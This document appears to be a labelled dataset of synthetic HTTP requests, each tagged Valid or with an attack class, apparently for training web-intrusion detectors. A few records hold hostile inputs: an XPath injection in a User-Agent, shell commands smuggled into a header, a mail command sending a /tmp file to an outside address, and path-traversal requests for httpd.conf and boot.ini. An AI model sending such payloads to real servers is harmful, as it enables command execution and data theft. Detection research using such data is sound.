GET /g6aeeCi3u2edeu/hIWyp/iQkcadvnzgd-g0C/etdmc7syndUjypp/mVIRpawKsR/raSJ/yjz2OJr/iletd4Maao/SuOMWautoexec.Zim1_i.php4?sbawRn9nmetrgni=%3Eyy&nelyimtf=cd5+rGtetmR&LkMGF=iorfse&loriea=86&XzrRetmddIeew=uthiem9tlarMetsl&Xnph-Ubj=13143477&ot5=76551&es=osm&JvarSjkWq=pnrs9txOt&tocr4paudsdl6ir=uEWcZEO&aesatchug=3r&md=lcy+lgw&riroeotuTl1uerr=ta8atiO8h7rFh&zjgao=0et%29e HTTP/1.1
Host: www.eoet9ldnN.st
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-8859-2;q=0.2, euc-tw, x-mac-turkish;q=0.3
Accept-Encoding: *;q=0.2
Accept-Language: eosddas-3rLrst;q=0.4, Dy-eu;q=0.8, e-naadnasU, 9soa-e, tt-f;q=0.0
Cache-Control: no-cache
Client-ip: 44.204.170.197
Cookie: ee=326168;pll=1734;hC09BW=t6e4ca/4lne;UrHe=a9KR2O5KR
Cookie2: $Version="40"
Date: Tue, 03 Jan 06 20:42:59 GMT
ETag: "EY1v5K30dn1.s4fbHQaz"
Expect: 100-continue
From: nwa4tf@flsrn.org
If-Modified-Since: Mon, 03 Oct 05 15:56:02 CET
If-Unmodified-Since: Sat, 24 May 08 03:20:44 GMT
If-Match: "HBMe1aeBqig_XQZo"
If-None-Match: "DxLA28XFb1EGEoOsikr"
If-Range: "rarI-vOvVxzKFTgOQl2w"
Max-Forwards: 299
MIME-Version: 4.4
Pragma: ps6ucl=egElauC
Proxy-Authorization: Basic dDFzcjphcGxtb2V0ZQ==
Authorization: Basic T250ZHB0bzk6YWN6ZWZUdlQ=
Range: -0
Referer: /FahtNRat/Brde1/tsnbene/a0EiVe.shtml
TE: gzip;q=0.8,gzip;q=0.5
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.1 (Windows; U; WinNT 3.0; ta-mo; rv:4.5.3) Gecko/91050412
UA-CPU: x86
UA-Disp: 2495,184,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8595x9488
Via: 1.5 www.ieids.gif:91, FTP/3.6 www.enENMecg.js:61, 3.7 www.stoe.shtml
Transfer-Encoding: compress
Upgrade: Ctu57e/3.8, chee/8.1, lrvDmi/8.7, i9hei/6.7
Warning: 538 220.84.138.187 "risamfaWl6rs" "Tue, 09 Mar 04 19:12:07 UTC"
X-Forwarded-For: 225.250.72.17
X-Serial-Number: 343586
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18699
Start - Id: 21996
class: Valid
GET /Wk.jpg?aaua4kph=a7e+oeexecnhLeos4ia8 HTTP/1.0
Host: www.nqesdRrs.it:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: t3berfj3-a, ndE-uoksd, deatehaa-a;q=0.9
Cache-Control: max-stale
Client-ip: 177.69.64.222
Cookie: brd8dHpizo4stk=tab46gJjll;h9Ynhteaha=31909066;0FtvLUphp=8908456
Cookie2: $Version="3"
Date: Sun, 13 Feb 05 08:45:25 CET
ETag: W/"y@a9fTus_RQlTN96"
Expect: t1pAvt=twGl;duahhn
From: suceO@teSeaq.com
If-Modified-Since: Tue, 17 Jan 06 14:08:45 GMT
If-Unmodified-Since: Wed, 20 Feb 08 03:59:11 UTC
If-Match: "r.2_veWp@7kTF5xCquPs"
If-None-Match: "rzekyQDIk2TcBX6I-t"
If-Range: "6QHvEP8hz4Xn2b.5ZCrB"
Max-Forwards: 1559
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: acWit iAe1idba=buioi
Authorization: Digest response="1Cf7Fa513Bba1918bd1ad9C06B9cAc5b"
Range: 2-874,8-,3113-623962
Referer: http://www.seuSad5z.fr/xd0z.pdf
TE: chunked,trailers
Trailer: Expect
User-Agent: bequawh (1_OJwFj3tn; scFsyq; mPNFxKJ.4)
UA-CPU: PowerPC
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3071x562
Via: 0.0 www.qemxnsH.js, 9.7 23.237.238.213, HTTP/4.1 135.16.184.35:1718
Transfer-Encoding: 5nsr; ogShn=teeeMAi
Upgrade: nits7o/4.1
Warning: 814 www.wnsr.tiff "u5i9el" "Sat, 09 Feb 08 13:42:11 GMT"
X-Forwarded-For: 8.4.31.107
X-Serial-Number: 920022590702
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21996
Start - Id: 12595
class: Valid
GET /sQq.EQJrr3ya/frtiwtio08etsentSu/MeDItncZa9U/2LmgNrosSy--.in/ITUvarVZTHy9/0h1uWrlshfeAsa/3GQQ6uDddWtO.aspx?2ftnrirO9d=9ro&m2siiD=sethihr&amn0ah=rpDjn&Rrhriin2=etc33De&aduadt1tyle=tohedE&tp2csoe8meieb=60181081&atoEtulnarr=1htnthz8rioope&kaQbncB96m=4493092&yn=%5BsN+connectt HTTP/1.1
Host: 254.21.35.158
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, cp-950;q=0.8, cp-950, windows-1257;q=0.2, iso-8859-1;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 139.134.8.81
Cookie: wmrytt=eardocumento&Ie;sNstblenh=0seaes2oaitThe;G8_1Z4W=brclh;9nQK@Qdfr=aleH9ewessid
Cookie2: $Version="5"
Date: Wed, 25 Apr 07 06:05:07 GMT
ETag: "9msxFVcv@1EKQ5tlu3"
Expect: 100-continue
From: Hsttkg@positcooU.be
If-Modified-Since: Fri, 16 Jan 09 21:12:16 GMT
If-Unmodified-Since: Sun, 01 Aug 04 13:43:41 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4813
MIME-Version: 3.2
Pragma: oh='s'
Proxy-Authorization: ohlend 5tstwcsv=aehbgNa
Authorization: Basic dnM4YWh1Om5lMnRw
Range: 6-190
Referer: http://www.mxxeaoea.biz/rwrtoer/icxleI/lhud/pjiI/oen6asqc.sh
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: oeVl (e1XK0b; 51wgoEUTV0; oVURi1wWdF; rAAH0VlD)
UA-CPU: 68000
UA-Disp: 3446,218,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 280x609
Via: 2.8 215.71.2.5, HTTP/5.4 www.txntsge.jpeg
Transfer-Encoding: identity
Upgrade: 3n9/9.5, ido/8.7, mo5iss/2.2
Warning: 950 23.61.199.108 "rrrlTggd8Eewtaio" 
X-Forwarded-For: 75.184.77.165
X-Serial-Number: 3472507595174879
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12595
Start - Id: 3969
class: Valid
POST /asotardixu7/tntllnutgo.cgi? HTTP/1.1
Content-Length: 63
Content-Language: hdtgr,saao
Content-Encoding: deflate
Content-Location: /g1esetnj/5peaelfb/Atdsan6/stc1ao/oecpcser.zip
Content-MD5: c2hhZm5pcHJzaHJyRHN0Rw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 28 Sep 04 18:14:50 GMT
Last-Modified: Wed, 07 Apr 10 11:38:42 CET
Host: www.ecomwi.com:80
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-cn;q=0.8, windows-1258;q=0.0, x-mac-icelandic;q=0.4, gb2312
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: min-fresh=37
Client-ip: 120.188.127.49
Cookie: demt=5950161;turaopten=77;dmTns0adg=smmeUuo6VcK;APVo=03950;bx3aaio=mhae5t
Cookie2: $Version="669"
Date: Mon, 27 Aug 07 18:40:31 GMT
ETag: "VEWzPNSQWdwTr-4zJ"
Expect: 100-continue
From: nlsirS@iuLqmfser.st
If-Modified-Since: Thu, 06 Jul 06 21:05:17 UTC
If-Unmodified-Since: Mon, 25 May 09 20:09:06 GMT
If-Match: "t-F0P7VF5xKAuWbK-P@Z"
If-None-Match: *
If-Range: Sun, 06 May 07 08:41:01 UTC
Max-Forwards: 649
MIME-Version: 2.6
Pragma: xsotyaaN=hdel8
Proxy-Authorization: Basic NEVpRTprZXJkMg==
Authorization: NTLM ZzQxYW9ncnJNeWxlc3RuclphY2ZjaWw2bmY2NHNuc2g2UWhjTWV5bg==
Range: -1776
Referer: http://0ndi.uk/onerdnVi/tiEr/itlw.pdf
TE: chunked;q=0.8,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: ip6a9toau (l78o.KvmZ; 1S0xB0r)
UA-CPU: Sparc
UA-Disp: 4256,175,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9565x666
Via: aciO/3.3 42.127.168.141, 2.9 www.AnaOM.css, sesko/3.5 171.227.136.83
Transfer-Encoding: identity
Upgrade: tnoc/2.8, twh/6.6, d0clah/7.2
Warning: 604 16.56.124.243:37484 "9ia6enlwgstuluh" 
X-Forwarded-For: 152.216.247.81
X-Serial-Number: 40666
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lsEx3ze9Tipoo=84&patrabeeoosxA=aahtb&aeysUvs=ep0ojneanrtenNStdR

End - Id: 3969
Start - Id: 48382
class: XPathInjection
GET /iwh4FWfi/6tioEaoaahoivttttthd.php3?hje=6&soomrE8scyao=klsXfPf1&ueioe=se&rin6b0p=4529&aohoRyn5si=nTku0sock_streamri-Fxk&snon=hu+&zSA@pt.7xmail9=p2uLeKEb9v3u&eCZmY0RninputdV=au5sqUiw2b&Brhes1t8lamD=cg%27&kadiboMdx=7qe7.6XmZw&sn3yorrgiJcqo=-nveT&iYr=16659&tlaW51s3=e9a+ HTTP/1.1
Host: 3.117.171.224
Connection: nnis
Accept: */*;q=0.3
Accept-Charset: koi8;q=0.7, x-mac-arabic, iso-8859-3;q=0.4, iso-8859-2
Accept-Encoding: *;q=0.0
Accept-Language: 8s3dnilj-myinoda;q=0.5, tiowgrs4-lr;q=0.5, retcu-epeeiie;q=0.0
Client-ip: 134.11.89.203
Cookie2: $Version="15"
Date: Sun, 13 Mar 05 03:09:51 GMT
If-Unmodified-Since: Mon, 22 Dec 08 11:47:24 CET
If-None-Match: *
If-Range: Sun, 29 Jul 07 04:58:07 CET
Max-Forwards: 863
MIME-Version: 4.2
Pragma: agrCfTy=jao
Proxy-Authorization: Digest username="annrnhk"
Referer: http://www.yoswoOe.biz/ekyewe/xalrpSs/wOeSe/gilu/sesjUs.shtml
User-Agent: rrorhfar'    or 6 < count(path/child::*) or    'eS'=    '
UA-Color: color16
Upgrade: oolr/4.9, bhmeg/8.2, eks/9.6, cid/9.6, Nteies/6.7
Warning: 849 11.210.111.193 "r2apTszano81jij" "Fri, 22 Apr 05 09:45:13 CET"
X-Serial-Number: 0552826748699653

null

End - Id: 48382
Start - Id: 5628
class: Valid
POST /5egzA32dzFZ/upaAaoNE7e96/egTdUbY6CHqU5Y/nzLd/vinput/aG/eeSSceoHOIKHWlH.cfm? HTTP/1.1
Content-Length: 26
Content-Language: dlTrS14,ettTrrmi,aeti
Content-Encoding: deflate
Content-Location: /yret/sTlaMyeH/m64ovc/tirKyawn/ctgosw.swf
Content-MD5: aXhhdHlBdHVhdGRhV245bQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Aug 04 04:20:01 CET
Last-Modified: Thu, 24 Nov 05 03:31:08 UTC
Host: 215.243.19.26
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-2;q=0.7, us-ascii, windows-874;q=0.8, cp-936
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=3658
Client-ip: 236.196.163.25
Cookie: uSLraaiden=npimRetiTHOiarRn;E9QmHstylen=sbaccess_log;Kz@@=ss1psi
Cookie2: $Version="82"
Date: Fri, 22 Jun 07 05:12:01 GMT
ETag: W/"5_99s69o3YZTg9.dBwO"
Expect: aGnab
From: frbac@ngi0nanafk.biz
If-Modified-Since: Tue, 15 Jul 08 22:38:21 UTC
If-Unmodified-Since: Sat, 25 Jun 05 14:05:33 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7522
MIME-Version: 9.8
Pragma: Wr9pah='hms'
Proxy-Authorization: eoaot ubahyefg=7a5iI
Authorization: heTtsd f7ta=thINso
Range: 67795-,06619-,662301-47622
Referer: http://www.ebozast.biz/weoco/Hi2ttxtd.jsp
TE: trailers,trailers,chunked;q=0.1
Trailer: If-Modified-Since
User-Agent: Mozilla/6.9 (compatible; MSIE 3.8; SunOS sun4u; u5ae)
UA-CPU: x86
UA-Disp: 6817,0716,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 768x653
Via: doisot/7.7 194.130.197.41, 5.2 59.186.241.137, 6.8 26.174.149.158
Transfer-Encoding: deflate
Upgrade: han/8.7, 10s/1.0, cttH8e/9.6, tmdb/9.7, qlteR/5.3
Warning: 865 www.holxn.css "aoehbntNeGcpervi4" 
X-Forwarded-For: 253.42.32.113
X-Serial-Number: 382947508350489867
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

4W5i83b=eeoaomemar8iaseld2

End - Id: 5628
Start - Id: 32245
class: Valid
GET /detixnoth5onwfX/sR/lyW.fEF98p_ysQEoD/xom@n/z7Zv3da/g2HkV/QKl.bin?7thcupn=+b+-iaaweea+tm&msxt9Oeireeea=epasswd&teIonxcqca=wrcQV&cwimh2esxn=s%3Ce&rb=ne-dr&TqarnTysea1=mPdY&3dmanen=4739964&ctalrd=utnae91roet HTTP/1.1
Host: 99.34.20.53
Connection: snshlk
Accept: */*;q=0.0
Accept-Charset: x-mac-chinesetrad;q=0.8, koi8, cp-950;q=0.5, windows-1257;q=0.2
Accept-Encoding: deflate, compress, compress;q=0.3, identity;q=0.2
Accept-Language: imnm3s-5fi2lrht
Cache-Control: only-if-cached
Client-ip: 124.219.117.18
Cookie: Evego4cr=0'vmo;i2=i bf;6tzaondjso=n8jinsertnph-;eLi2I=u
Cookie2: $Version="57"
Date: Tue, 21 Nov 06 17:10:09 GMT
ETag: "52QtU01ChCXqCgIMc3n"
Expect: liiw=oSls
From: ajtRne@yawe.com
If-Modified-Since: Wed, 13 Feb 08 22:14:38 GMT
If-Unmodified-Since: Fri, 24 Sep 04 03:06:35 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Apr 07 24:57:08 CET
Max-Forwards: 038
MIME-Version: 7.8
Pragma: 6ne='u'
Proxy-Authorization: AIrohr nh5ho5ft=elhiago
Authorization: Basic ZTZja3lqYXQ6dGVndA==
Range: -594,-1001,-2
Referer: /enett7t/ivsrn/gge4re/wteWke/qhjr.gif
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: rhUcqe (s8weKrM9H; duYHe7UcMy; gq2yR.3C; nwSQM823; tYKEKOK)
UA-CPU: StrongARM
UA-Disp: 8350,6514,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2503x5889
Via: 9.1 www.suaact.gif, HTTP/5.2 206.202.245.77:6, 5.6 52.71.81.81
Transfer-Encoding: usnhm; alea=lpnthocx
Upgrade: fehAnr/5.2, a6eTe/9.4, heim/2.3
Warning: 602 144.130.40.102:3150 "plh6WcLdah6ntnF" 
X-Forwarded-For: 145.88.219.204
X-Serial-Number: 76488
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32245
Start - Id: 23324
class: Valid
GET /tAstohxeows2bss/mCooetaeldttts1sa/wgetKGan-Q0sg/WeconnectIKbetween0@5GFz/5Q74betweenV3JWgroup by/xJfPCUpBb0ec/rih/ETAYRQ27c9optWdivG/niwihattFLnhVlJkae/marnwnyructnndsLdrs/sVtsehnpen3_h7o1a.mdb?nnwhLwelqrhor9t=w8+airtk9n0e2&dlSsineto=4410697&teooe2a4=25516&si2oiow=iupdate&ltoetrise2oilsa=85 HTTP/1.1
Host: 28.122.223.221:80
Connection: close
Accept: application/*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: po-hqas;q=0.6, l-ttoirts;q=0.9, e45u-7AtZsc;q=0.3, r-nrtnvin, rhacbSj4-wg;q=0.4
Cache-Control: dhC2Id='oniTioee'
Client-ip: 92.39.34.13
Cookie: ees=35;ahQAKJ=igetr;edib4=oar vxml0;6nerelha=n;nmailIHpMZ9V=a;45JPN5.OEd=i
Cookie2: $Version="186"
Date: Thu, 22 Jul 04 01:28:16 GMT
ETag: W/"ynrqS@txFebq1J5v8"
Expect: 100-continue
From: nj1rhh3i@oh7torqhee.uk
If-Modified-Since: Thu, 15 May 08 19:19:00 GMT
If-Unmodified-Since: Wed, 17 Mar 10 03:50:03 CET
If-Match: *
If-None-Match: "hKQDb@EQWAHcc3Eo6JR"
If-Range: Sat, 01 May 04 09:42:07 CET
Max-Forwards: 1749
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM dTBjaEVvb3NzUm92c2Jvc2xvcW05UllvMWxpcG5hVGUwZWVuZHRkb3Ns
Authorization: Digest uri=/hbeyned/2frRo/tipxd4e/nntAe.nsf
Range: 56641-,-4,2-
Referer: /taatr.tiff
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 3.8; qI-ya; rv:6.7.6) Gecko/03050302
UA-CPU: 68000
UA-Disp: 295,003,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 229x4077
Via: 1.6 www.3nEg5r.css, cYsd/4.7 184.29.86.41
Transfer-Encoding: aamat
Upgrade: eeer/9.5, ezn/0.2, eeM/5.1, hiAKQE/1.2
Warning: 614 www.eyqtEs.shtml "o4SsAiadTpu" "Mon, 26 Jul 04 10:18:10 GMT"
X-Forwarded-For: 93.28.77.128
X-Serial-Number: 22361064185048
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23324
Start - Id: 43609
class: OsCommanding
POST /0dMn8/mRO/fKMtLV.iupXrX18jV/pmq7oZkw8zZdBQMFuXxw/ssr5asmbwgdae/oiyees/lIOJusCHNlL1e/a8FAgl.php3? HTTP/1.0
Content-Length: 116
Content-Language: ii,Is,Yhheoi
Content-Encoding: compress
Content-Location: /dv1w/nxratj/os8n0/3lCjaa/N7lur.sh
Content-MD5: cXRvd2UzbDZ1cGVydGg1cg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 29 Oct 06 02:02:00 UTC
Host: www.nEiszn.st:0
Connection: hniswn
Accept: audio/x-wav, audio/*;q=0.7
Accept-Charset: *;q=0.3
Accept-Encoding:  ; echo ;    w    ;  uname -a   ; id
Accept-Language: *
Cache-Control: mqpl=iue
Cookie2: $Version="6"
Date: Tue, 09 Jan 07 01:54:33 GMT
Expect: oaf3noe=Atol;teOt7oln=Tnae
If-Unmodified-Since: Sat, 23 Feb 08 06:40:33 UTC
If-Match: *
If-Range: Thu, 28 Dec 06 07:45:19 UTC
Max-Forwards: 41
Authorization: Basic YlJmZWg6VHN3ZXZz
Range: 29587-,-5463,921-
Referer: http://www.loeaNd.ch/oterao/eacut7/4nEoir/9hersT.txt
User-Agent: Mozilla/1.2 (compatible; Konqueror/5.8; WinNT; smel; eosu7x6rn)
UA-CPU: 68000
Transfer-Encoding: gzip
X-Forwarded-For: 84.166.3.208
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

da1ne=30033546&zacBKP=57239902&Klog6madminAG=\fhhboot.iniyena&olugNrdaoiisept=elt3gaktat&en=78&8wdsehlNthith=@Oe

End - Id: 43609
Start - Id: 31566
class: Valid
GET /awm7teTlt/httpsQNreKpXcN-/u4FrXOD9pKYL/zU6U6s4hWYcR/fBCjCkOhVmechohtaccesD/gwuoch42wefnenrauriy/Gstdini_Hp-/eTkk3/3L/r5fkucU.EXoBfcKD8/cH4/eS-eTIDEAxTPbOFg.js?hesLwidn=245369956&ec=053&iiRatiooUn=tiLgAmGI&a8he=0&xsldzv=mo&Tbeoha=1&tahcuanr=lu&vTatsrq6salewt=yczv%40R-O4fz&f94irgil=%3De&kd9a=n%3Ddn&be5kftp0Uq=+%3A%40%5C HTTP/1.0
Host: 99.228.189.0:486
Connection: aysz
Accept: */*;q=0.1
Accept-Charset: windows-1258, iso-8859-6;q=0.5, iso-2022-kr;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 201.238.6.219
Cookie: t9rlsFmtyict9=?nh;nmhtD1rosaebaa=6519326
Cookie2: $Version="072"
Date: Tue, 06 Dec 05 21:53:18 CET
ETag: W/"6RST.bD-FTLuqR.0zM"
Expect: 7obvlt
From: iaar@tt4tqltp.org
If-Modified-Since: Wed, 28 Oct 09 13:28:13 GMT
If-Unmodified-Since: Wed, 13 Jun 07 13:07:36 GMT
If-Match: "tdsBe17qCHBmIUOODV"
If-None-Match: "y_5lcgoa3vGceshM"
If-Range: ".0ZtQS-vwsl2cggyfSNN"
Max-Forwards: 7705
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=/xtnll9t/nhneg.jpg
Range: -40023,010285-,775998-
Referer: http://www.hxohst3.st/b2ius.html
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.5 (compatible; MSIE 6.6; Linux i586; sskh; aahmdxutoo; 9rphdagru)
UA-CPU: Sparc
UA-Disp: 7964,455,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 951x498
Via: 2.8 www.axswirq.htm
Transfer-Encoding: gzip
Upgrade: epi/8.9, P0i/3.1, tdsea/1.4
Warning: 706 219.37.111.64 "5rhSqrlrse8tacoit" 
X-Forwarded-For: 190.159.59.68
X-Serial-Number: 7616561595248452
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 31566
Start - Id: 46392
class: PathTransversal
GET /ZV_f9Ht8bP/yLkbrjhD3c/to1srxv2Mxn3qt/lorpeleo0h/aHOrd/arc/orsodfizrud.gif?jenaxtrhlbheg=%2Fetc%2Fhttpd%2Fhttpd.conf&Koptgroup byfP3KOE=htacceslDf&9us=th0ai%28 HTTP/1.1
Host: 154.13.3.141
Connection: close
Accept: text/plain;q=0.6, text/html;q=0.7
Accept-Charset: iso-10646-ucs-2;q=0.3, us-ascii;q=0.7, cp-932;q=0.8, iso-8859-8-i, euc-jp
Accept-Encoding: *;q=0.5
Accept-Language: z0nnfur-UsiaRts, ud3ljiba-wc
Cache-Control: no-transform
Client-ip: 23.79.216.68
Cookie: d2rgi4A3d=eoe?;iern0st=U9t;9jD4uHbyA=uDi.z2.tfdx
Cookie2: $Version="7"
Date: Sat, 21 May 05 20:22:32 CET
ETag: "oKvFvmndVfB@fQhk6Q1"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Fri, 16 Jul 04 01:14:50 UTC
If-Unmodified-Since: Fri, 17 Apr 09 23:09:11 GMT
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Mon, 06 Oct 08 07:40:08 GMT
Max-Forwards: 436
MIME-Version: 3.3
Pragma: unri=b0
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest nonce
Range: 724-
Referer: /nzrle2zp.asp
TE: gzip,trailers,deflate;q=0.0
Trailer: If-Match
User-Agent: Mozilla/9.8 (X11; U; Unix 6.0; eu-iL; rv:4.2.9) Gecko/09807107
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 5.8 www.Naoc.tiff
Transfer-Encoding: gzip
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
X-Serial-Number: 75398657
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46392
Start - Id: 36814
class: OsCommanding
GET /lsjmenr/eK-nr6tA0jdPyPQv/barhedttrhhu2fnow7we/omYnnHxOG8f@lQBzPR_/KEuIUbin0Q/ebZaOud_Dp/rTOi2PxAS_b/hsloiaesStbjlaai4o/citthmldsdp.asmx?blttlte9ok=mail+++++ibitdat%40tiI.fydt.gov++++%3C%3C+++%2Ftmp%2Fwu.c++++%3B&inraase=s%3Baaa%3Beaastofd HTTP/1.1
Host: www.lronetwone.cz
Connection: 7ahspg
Accept: */*
Accept-Charset: us-ascii, windows-1254;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: tTuHyoeo-xthmYmwy
Cache-Control: no-store
Client-ip: 167.61.38.24
Cookie: oajB=i78sPVBW
Cookie2: $Version="089"
Date: Sun, 07 Mar 04 14:45:59 GMT
ETag: W/"IwRSCh-Gi4tuD8qE3"
Expect: 100-continue
From: snesreme@aDfeh6odeu.gov
If-Modified-Since: Tue, 13 Jan 09 19:21:41 UTC
If-Unmodified-Since: Tue, 08 Mar 05 02:05:43 GMT
If-Match: *
If-None-Match: "XIxQYM2qutBnAPN"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 29
MIME-Version: 2.5
Pragma: en=h
Proxy-Authorization: Digest response="58C55118C31Bc2CeF0dbFC24cD1DCe18"
Authorization: NTLM YW5ldWFidHJtcmhuZWNkZXJubWVoZW50b3NheGRicnBtcnIwYWVhNE51YQ==
Range: -9,0-,-53
Referer: http://fric.fr/eaeR/Imda/1eherr.sh
TE: gzip;q=0.8,trailers
Trailer: If-Match
User-Agent: Mozilla/3.7 (compatible; 8soeh; WinNT; khGilt; peeItr)
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 8261x3395
Via: 4.4 www.eoatezc.gif:16570
Transfer-Encoding: identity
Upgrade: diz/2.5, oaahpo/0.7
Warning: 158 www.0rmm.html "ya0trItDfsofel" 
----: -----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 36814
Start - Id: 15131
class: Valid
GET /7itTavnm/uS8-5yJ8zinsert/nxsytGc/.uK3n/zYDP6formxJmidocument/oabnydTero/ssaiaegfefln9hl3nbnh/lHqHHbmG7Gg/nsrbnhnE/update1o6/bfz/stlPpPNj.shtml?px=be-&ihoRygbhFoisgiu=2acceptl&a5hmEq=3iframeaeeheawinnth1n&eueioAwt4emsh=sock_streameWcienetcat&od=41057347&olsnhwxts6k=4ieo+42S4%27nti&TqDA=eWGv1qj7&Yjr7q.OvVl7L=odr6n&wutjhionzgq=eW&phe4na=ieodaiyeDte9&b4Odie6Fkaft=gcmdvadmine HTTP/1.1
Host: www.lortsmhoto.de
Connection: close
Accept: */*
Accept-Charset: gb2312, utf-8;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=82335
Client-ip: 238.189.15.82
Cookie: 7gia=http34ahlk0du lat
Cookie2: $Version="6"
Date: Sat, 28 Mar 09 12:05:16 CET
ETag: "gpo4vmx3e_svOHVb"
Expect: 100-continue
From: oninthv@aieSheG.st
If-Modified-Since: Sat, 27 Jun 09 17:40:20 GMT
If-Unmodified-Since: Wed, 23 Dec 09 12:03:36 CET
If-Match: *
If-None-Match: "xi0C@WGAjnqvFFwLJjj"
If-Range: "iWJFNWFJve5w_cmB-Icw"
Max-Forwards: 0
MIME-Version: 6.6
Pragma: ienahta='ntclt1on'
Proxy-Authorization: NTLM cjN2d0l6NmxVOHJuaWgxOWhlZWFpdmV6YTJub3JON3Q=
Authorization: Basic cnZvdG86dGU4ZWx0RA==
Range: 8-,8116-1
Referer: http://in8eOd3l.fr/gsbWg/9Ft4b/tmutrI/l0de/Half.mdb
TE: trailers,gzip,gzip;q=0.7
Trailer: User-Agent
User-Agent: Mozilla/5.5 (Windows; U; Win98 5.3; ut-yr; rv:3.2.4) Gecko/64088176
UA-CPU: 68000
UA-Disp: 7020,108,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 572x437
Via: FTP/3.1 211.163.140.137, 6.4 www.rSnl.htm
Transfer-Encoding: compress
Upgrade: qafs/3.4, ntrid/3.1, Ffue/7.1, 5uetew/4.0, pt9exy/2.3
Warning: 492 198.163.135.58 "Xr8olpskba5escfetmfl" "Tue, 05 Jul 05 16:42:14 UTC"
X-Forwarded-For: 79.50.237.25
X-Serial-Number: 233434892494
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15131
Start - Id: 23134
class: Valid
GET /e8fr0r/j4clnC/SkNWdeletedzgsskjHcu/6tmpbetweenrA/5N5R/YWI8RMEmLe/t7urh2ifreh5etrulet/htma3irT/nhVN0StMgNNYTp.asp?Eeawimq=ethsk1ghjebetweeneS&bf1=305469&sscript2JNM0=9&rc6e49o8rohoeg=do6a3lsolnIr HTTP/1.0
Host: 108.23.244.141
Connection: keted
Accept: */*;q=0.2
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 114.241.46.240
Cookie: .vM6v0Lcmdkb3=vRlql@44Dsf;rt=eeLl
Cookie2: $Version="12"
Date: Sun, 19 Mar 06 11:32:29 GMT
ETag: "ln@-DQt5MAST7dr"
Expect: kseno7lE=dU2ds;5eOtlDeH
From: xtisieil@oihdn.cz
If-Modified-Since: Thu, 19 Jul 07 06:24:07 GMT
If-Unmodified-Since: Mon, 20 Oct 08 01:21:15 CET
If-Match: *
If-None-Match: "7@7i4jbJUVFfFu7"
If-Range: Tue, 19 Oct 04 20:36:14 UTC
Max-Forwards: 82
MIME-Version: 0.1
Pragma: n=o3
